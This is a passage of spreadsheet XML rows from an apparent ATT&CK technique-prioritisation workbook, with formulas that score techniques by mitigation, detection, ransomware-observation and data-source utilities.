        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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73" spans="1:47" ht="51">
      <c r="A373" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B373" s="37">
        <f t="shared" si="5"/>
        <v>196.93333333333334</v>
      </c>
      <c r="C373" s="37" t="s">
        <v>1309</v>
      </c>
      <c r="D373" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E373" s="37" t="s">
        <v>1310</v>
      </c>
      <c r="F373" s="37">
        <v>1</v>
      </c>
      <c r="G373" s="37">
        <v>1</v>
      </c>
      <c r="H373" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I373" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J373" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K373" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L373" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M373" s="37">
        <v>0</v>
      </c>
      <c r="N373" s="56">
        <v>1</v>
      </c>
      <c r="O373" s="56">
        <v>4</v>
      </c>
      <c r="P373" s="56">
        <v>1</v>
      </c>
      <c r="Q373" s="56">
        <v>1</v>
      </c>
      <c r="R373" s="57"/>
      <c r="S373" s="57">
        <v>0</v>
      </c>
      <c r="T373" s="57"/>
      <c r="U373" s="57">
        <v>0</v>
      </c>
      <c r="V373" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>3.3333333333333333E-2</v>
      </c>
      <c r="W373" s="37">
        <v>0</v>
      </c>
      <c r="X373" s="37">
        <v>0</v>
      </c>
      <c r="Y373" s="37">
        <v>0</v>
      </c>
      <c r="Z373" s="37">
        <v>7</v>
      </c>
      <c r="AA373" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB373" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC373" s="37"/>
      <c r="AD373" s="50" t="s">
        <v>1311</v>
      </c>
      <c r="AE373" s="37" t="str" cm="1">
        <f t="array" ref="AE373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD373)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF373" s="37">
        <v>369</v>
      </c>
      <c r="AG373" s="37" t="str" cm="1">
        <f t="array" ref="AG373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD373)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH373" s="37">
        <v>369</v>
      </c>
      <c r="AI373" s="37" t="str" cm="1">
        <f t="array" ref="AI373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD373)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ373" s="37">
        <v>369</v>
      </c>
      <c r="AK373" s="37" t="str" cm="1">
        <f t="array" ref="AK373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD373)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL373" s="37">
        <v>369</v>
      </c>
      <c r="AM373" s="37" t="str" cm="1">
        <f t="array" ref="AM373">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD373)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN373" s="37">
        <v>0</v>
      </c>
      <c r="AO373" s="37">
        <v>0</v>
      </c>
      <c r="AP373" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ373" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>65.644444444444446</v>
      </c>
      <c r="AR373" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS373" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT373" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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74" spans="1:47" ht="51">
      <c r="A374" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B374" s="37">
        <f t="shared" si="5"/>
        <v>317.35728390476191</v>
      </c>
      <c r="C374" s="37" t="s">
        <v>1315</v>
      </c>
      <c r="D374" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E374" s="37" t="s">
        <v>1316</v>
      </c>
      <c r="F374" s="37">
        <v>1</v>
      </c>
      <c r="G374" s="37">
        <v>1</v>
      </c>
      <c r="H374" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I374" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J374" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K374" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L374" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M374" s="37">
        <v>0</v>
      </c>
      <c r="N374" s="56">
        <v>0</v>
      </c>
      <c r="O374" s="56">
        <v>0</v>
      </c>
      <c r="P374" s="56">
        <v>0</v>
      </c>
      <c r="Q374" s="56">
        <v>0</v>
      </c>
      <c r="R374" s="57" t="s">
        <v>1317</v>
      </c>
      <c r="S374" s="57">
        <v>4</v>
      </c>
      <c r="T374" s="57" t="s">
        <v>1307</v>
      </c>
      <c r="U374" s="57">
        <v>8</v>
      </c>
      <c r="V374" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.11428580952380953</v>
      </c>
      <c r="W374" s="37">
        <v>12</v>
      </c>
      <c r="X374" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Y374" s="37">
        <v>0.21818199999999999</v>
      </c>
      <c r="Z374" s="37">
        <v>0</v>
      </c>
      <c r="AA374" s="37">
        <v>0</v>
      </c>
      <c r="AB374" s="37">
        <v>0</v>
      </c>
      <c r="AC374" s="37"/>
      <c r="AD374" s="50" t="s">
        <v>1318</v>
      </c>
      <c r="AE374" s="37" t="str" cm="1">
        <f t="array" ref="AE374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD374)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF374" s="37">
        <v>370</v>
      </c>
      <c r="AG374" s="37" t="str" cm="1">
        <f t="array" ref="AG374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD374)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH374" s="37">
        <v>370</v>
      </c>
      <c r="AI374" s="37" t="str" cm="1">
        <f t="array" ref="AI374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD374)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ374" s="37">
        <v>370</v>
      </c>
      <c r="AK374" s="37" t="str" cm="1">
        <f t="array" ref="AK374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD374)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL374" s="37">
        <v>370</v>
      </c>
      <c r="AM374" s="37" t="str" cm="1">
        <f t="array" ref="AM374">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD374)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN374" s="37">
        <v>0</v>
      </c>
      <c r="AO374" s="37">
        <v>1</v>
      </c>
      <c r="AP374" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ374" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>105.7857613015873</v>
      </c>
      <c r="AR374" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS374" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT374" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU37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2.542518126228269</v>
      </c>
    </row>
    <row r="375" spans="1:47" ht="34">
      <c r="A375" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B375" s="37">
        <f t="shared" si="5"/>
        <v>162.64285714285714</v>
      </c>
      <c r="C375" s="37" t="s">
        <v>1319</v>
      </c>
      <c r="D375" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E375" s="37" t="s">
        <v>1320</v>
      </c>
      <c r="F375" s="37">
        <v>1</v>
      </c>
      <c r="G375" s="37">
        <v>1</v>
      </c>
      <c r="H375" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I375" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J375" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K375" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L375" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M375" s="37">
        <v>0</v>
      </c>
      <c r="N375" s="56">
        <v>0</v>
      </c>
      <c r="O375" s="56">
        <v>1</v>
      </c>
      <c r="P375" s="56">
        <v>0</v>
      </c>
      <c r="Q375" s="56">
        <v>1</v>
      </c>
      <c r="R375" s="57"/>
      <c r="S375" s="57">
        <v>0</v>
      </c>
      <c r="T375" s="57" t="s">
        <v>1321</v>
      </c>
      <c r="U375" s="57">
        <v>0</v>
      </c>
      <c r="V375" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W375" s="37">
        <v>0</v>
      </c>
      <c r="X375" s="37">
        <v>0</v>
      </c>
      <c r="Y375" s="37">
        <v>0</v>
      </c>
      <c r="Z375" s="37">
        <v>2</v>
      </c>
      <c r="AA375" s="37">
        <v>0.02</v>
      </c>
      <c r="AB375" s="37">
        <v>0.02</v>
      </c>
      <c r="AC375" s="37"/>
      <c r="AD375" s="50" t="s">
        <v>286</v>
      </c>
      <c r="AE375" s="37" t="str" cm="1">
        <f t="array" ref="AE375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD375)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF375" s="37">
        <v>371</v>
      </c>
      <c r="AG375" s="37" t="str" cm="1">
        <f t="array" ref="AG375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD375)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH375" s="37">
        <v>371</v>
      </c>
      <c r="AI375" s="37" t="str" cm="1">
        <f t="array" ref="AI375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD375)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ375" s="37">
        <v>371</v>
      </c>
      <c r="AK375" s="37" t="str" cm="1">
        <f t="array" ref="AK375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD375)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL375" s="37">
        <v>371</v>
      </c>
      <c r="AM375" s="37" t="str" cm="1">
        <f t="array" ref="AM375">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD375)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN375" s="37">
        <v>0</v>
      </c>
      <c r="AO375" s="37"/>
      <c r="AP375" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ375" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>54.214285714285715</v>
      </c>
      <c r="AR375" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS375" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT375" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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76" spans="1:47" ht="68">
      <c r="A376" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B376" s="37">
        <f t="shared" si="5"/>
        <v>148.9</v>
      </c>
      <c r="C376" s="37" t="s">
        <v>1322</v>
      </c>
      <c r="D376" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E376" s="37" t="s">
        <v>1323</v>
      </c>
      <c r="F376" s="37">
        <v>1</v>
      </c>
      <c r="G376" s="37">
        <v>1</v>
      </c>
      <c r="H376" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I376" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J376" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K376" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L376" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M376" s="37">
        <v>0</v>
      </c>
      <c r="N376" s="56">
        <v>0</v>
      </c>
      <c r="O376" s="56">
        <v>0</v>
      </c>
      <c r="P376" s="56">
        <v>0</v>
      </c>
      <c r="Q376" s="56">
        <v>0</v>
      </c>
      <c r="R376" s="57"/>
      <c r="S376" s="57">
        <v>0</v>
      </c>
      <c r="T376" s="57"/>
      <c r="U376" s="57">
        <v>0</v>
      </c>
      <c r="V376" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W376" s="37">
        <v>0</v>
      </c>
      <c r="X376" s="37">
        <v>0</v>
      </c>
      <c r="Y376" s="37">
        <v>0</v>
      </c>
      <c r="Z376" s="37">
        <v>0</v>
      </c>
      <c r="AA376" s="37">
        <v>0</v>
      </c>
      <c r="AB376" s="37">
        <v>0</v>
      </c>
      <c r="AC376" s="37"/>
      <c r="AD376" s="50" t="s">
        <v>1324</v>
      </c>
      <c r="AE376" s="37" t="str" cm="1">
        <f t="array" ref="AE376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD376)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF376" s="37">
        <v>372</v>
      </c>
      <c r="AG376" s="37" t="str" cm="1">
        <f t="array" ref="AG376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD376)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH376" s="37">
        <v>372</v>
      </c>
      <c r="AI376" s="37" t="str" cm="1">
        <f t="array" ref="AI376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD376)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ376" s="37">
        <v>372</v>
      </c>
      <c r="AK376" s="37" t="str" cm="1">
        <f t="array" ref="AK376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD376)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL376" s="37">
        <v>372</v>
      </c>
      <c r="AM376" s="37" t="str" cm="1">
        <f t="array" ref="AM376">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD376)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN376" s="37">
        <v>0</v>
      </c>
      <c r="AO376" s="37"/>
      <c r="AP376" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ376" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>49.633333333333333</v>
      </c>
      <c r="AR376" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS376" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT376" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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77" spans="1:47" ht="34">
      <c r="A377" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B377" s="37">
        <f t="shared" si="5"/>
        <v>803.37619047619046</v>
      </c>
      <c r="C377" s="37" t="s">
        <v>1325</v>
      </c>
      <c r="D377" s="50" t="s">
        <v>1272</v>
      </c>
      <c r="E377" s="37" t="s">
        <v>1326</v>
      </c>
      <c r="F377" s="37">
        <v>1</v>
      </c>
      <c r="G377" s="37">
        <v>1</v>
      </c>
      <c r="H377" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I377" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J377" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K377" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L377" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M377" s="37">
        <v>0</v>
      </c>
      <c r="N377" s="56">
        <v>1</v>
      </c>
      <c r="O377" s="56">
        <v>17</v>
      </c>
      <c r="P377" s="56">
        <v>23</v>
      </c>
      <c r="Q377" s="56">
        <v>51</v>
      </c>
      <c r="R377" s="57"/>
      <c r="S377" s="57">
        <v>0</v>
      </c>
      <c r="T377" s="57"/>
      <c r="U377" s="57">
        <v>0</v>
      </c>
      <c r="V377" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.43809523809523809</v>
      </c>
      <c r="W377" s="37">
        <v>0</v>
      </c>
      <c r="X377" s="37">
        <v>0</v>
      </c>
      <c r="Y377" s="37">
        <v>0</v>
      </c>
      <c r="Z377" s="37">
        <v>92</v>
      </c>
      <c r="AA377" s="37">
        <v>0.92</v>
      </c>
      <c r="AB377" s="37">
        <v>0.92</v>
      </c>
      <c r="AC377" s="37"/>
      <c r="AD377" s="50" t="s">
        <v>1308</v>
      </c>
      <c r="AE377" s="37" t="str" cm="1">
        <f t="array" ref="AE377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD377)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF377" s="37">
        <v>373</v>
      </c>
      <c r="AG377" s="37" t="str" cm="1">
        <f t="array" ref="AG377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD377)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH377" s="37">
        <v>373</v>
      </c>
      <c r="AI377" s="37" t="str" cm="1">
        <f t="array" ref="AI377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD377)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ377" s="37">
        <v>373</v>
      </c>
      <c r="AK377" s="37" t="str" cm="1">
        <f t="array" ref="AK377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD377)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL377" s="37">
        <v>373</v>
      </c>
      <c r="AM377" s="37" t="str" cm="1">
        <f t="array" ref="AM377">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD377)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN377" s="37">
        <v>0</v>
      </c>
      <c r="AO377" s="37"/>
      <c r="AP377" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ377" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>267.79206349206351</v>
      </c>
      <c r="AR377" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS377" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT377" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU37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78" spans="1:47" ht="68">
      <c r="A378" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B378" s="37">
        <f t="shared" si="5"/>
        <v>1955.6557074285713</v>
      </c>
      <c r="C378" s="37" t="s">
        <v>1327</v>
      </c>
      <c r="D378" s="50" t="s">
        <v>1328</v>
      </c>
      <c r="E378" s="37"/>
      <c r="F378" s="37">
        <v>4</v>
      </c>
      <c r="G378" s="37">
        <v>3</v>
      </c>
      <c r="H378" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.35</v>
      </c>
      <c r="I378" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J378" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K378" s="37">
